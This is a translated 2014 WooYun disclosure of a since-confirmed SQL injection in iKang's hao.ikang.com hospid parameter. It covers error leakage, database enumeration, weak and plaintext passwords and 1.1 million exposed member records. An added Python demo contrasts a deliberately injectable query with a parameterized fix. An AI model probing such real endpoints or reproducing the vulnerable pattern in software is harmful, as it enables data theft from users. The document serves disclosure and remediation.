Vulnerability summary

Defect ID: wooyun-2014-073820

Title: A flaw at 爱康国宾 (iKang) could leak 1.1 million (110W) users' information

Affected vendor: 爱康国宾

Author: 小胖子

Submitted: 2014-08-25 18:49

Fixed: 2014-10-09 18:50

Disclosed: 2014-10-09 18:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-08-25: Details sent to the vendor, awaiting vendor handling
2014-08-26: Vendor confirmed; details disclosed to the vendor only
2014-09-05: Details disclosed to core white hats and relevant domain experts
2014-09-15: Details disclosed to regular white hats
2014-09-25: Details disclosed to intern white hats
2014-10-09: Details disclosed to the public

Brief description:

Not much to say; I'm here to farm WB (WooYun credits) so I can join the crowdtest.

Detailed description:

Affected site: http://hao.ikang.com
Click any hospital at random and you end up at this link:
http://hao.ikang.com/?city=0021&Action=Operator&hospid=002
hospid is injectable; appending a single quote throws a database error that echoes the full statement and the server-side file path:

SELECT * FROM HOSPOPER WHERE HOSPID='002'' and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASCJKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error
Notice: JKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error in /web/mis9/libs/DatabaseJk.php on line 54


The table name leaked here will also make it convenient for us to look up passwords later.

[screenshot: sqlin.jpg]


There are then a lot of databases; this box appears to be your main database server.

available databases [38]:


At least these systems are hosted on it:
http://mec.ikang.com/
http://qcms.ikang.com/
http://mis2.ikang.com/
Many of them use plain MD5 hashing, and some even store plaintext passwords.
Weak passwords in trt:

[screenshot: ruokl TRT.jpg]


[screenshot: tingka.jpg]


And in hao:

[screenshot: 6666.jpg]


In short, many of the systems can be accessed: many databases, a lot of data.
The member tables under MIS2 and MISNEW
hold over 1.1 million member records.

[screenshot: 1168644.jpg]


Proof of vulnerability:

Database: WWW
[44 tables]
Database: SYSTEM
[160 tables]

Fix recommendations:

0x1: Don't put all databases on one server; cross-database reads were even possible.
0x2: Fix the injection point.
0x3: Asking for 20 rank.

Copyright notice: when reposting, credit the source: 小胖子@乌云
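For 0x2, an added example that is not from the report or from the vendor's code: the statement from the error message rebuilt two ways in Python against an in-memory SQLite stand-in (the real site is PHP on Oracle; the table rows and the three-digit hospid format are constructed assumptions). The spliced version fails on `002'` exactly as the page's error shows, while the bound-parameter version treats the same input as an ordinary value.

```python
import re
import sqlite3

# Constructed stand-in for the HOSPOPER table named in the error message; the
# real site is PHP on Oracle, and these rows are invented for the demo.
SCHEMA = """
CREATE TABLE HOSPOPER (HOSPID TEXT, OPERNAME TEXT, YKT_FLAG INTEGER);
INSERT INTO HOSPOPER VALUES ('001', 'oper-a', 0);
INSERT INTO HOSPOPER VALUES ('002', 'oper-b', 2);
INSERT INTO HOSPOPER VALUES ('002', 'oper-c', 1);
"""

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def query_vulnerable(conn, hospid):
    # Same shape as the leaked statement: hospid is spliced into the SQL text,
    # so a quote in the input rewrites the statement instead of the value.
    sql = ("SELECT * FROM HOSPOPER WHERE HOSPID='" + hospid +
           "' and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASC")
    return conn.execute(sql).fetchall()

def query_fixed(conn, hospid):
    # Bound parameter: the driver passes hospid as data, never as SQL.
    sql = ("SELECT * FROM HOSPOPER WHERE HOSPID=? "
           "and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASC")
    return conn.execute(sql, (hospid,)).fetchall()

def is_valid_hospid(hospid):
    # Defence in depth: the URL on the page uses hospid=002, so an allowlist of
    # exactly three digits is assumed here; reject anything else before querying.
    return re.fullmatch(r"[0-9]{3}", hospid) is not None

def probe(func, hospid):
    """Run one query variant and report ('ok', rows) or ('error', message)."""
    conn = open_db()
    try:
        return ("ok", func(conn, hospid))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()
```

Calling `probe(query_vulnerable, "002'")` returns an error tuple and `probe(query_fixed, "002'")` returns an empty result set; in production the error text itself should also stop reaching the client, since the page's response leaked the statement and the path /web/mis9/libs/DatabaseJk.php.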


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2014-08-26 11:56

Vendor reply:

Many thanks for discovering this vulnerability; it has been confirmed and we will handle it as soon as possible. Thank you!

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2014-08-25 18:56 | zeracker, certified white hat ( core white hat | Rank:1068 vulns:137 | More WooYun, more opportunities! WeChat public account id: a301zls ...)

    The poster is so candid....

  2. 2014-08-25 19:00 | HackBraid, certified white hat ( core white hat | Rank:1545 vulns:260 | ...)

    Looks like injection at a glance

  3. 2014-08-26 15:32 | px1624 ( regular white hat | Rank:1036 vulns:175 | px1624)

    ...another 20

  4. 2014-10-09 20:27 | 大漠長河 ( intern white hat | Rank:43 vulns:7 | Tianlongyuan scenic area welcomes you...)

    The poster's fix recommendations go in one ear and out the other for the vendor; only exposing, exposing and exposing again will make them take notice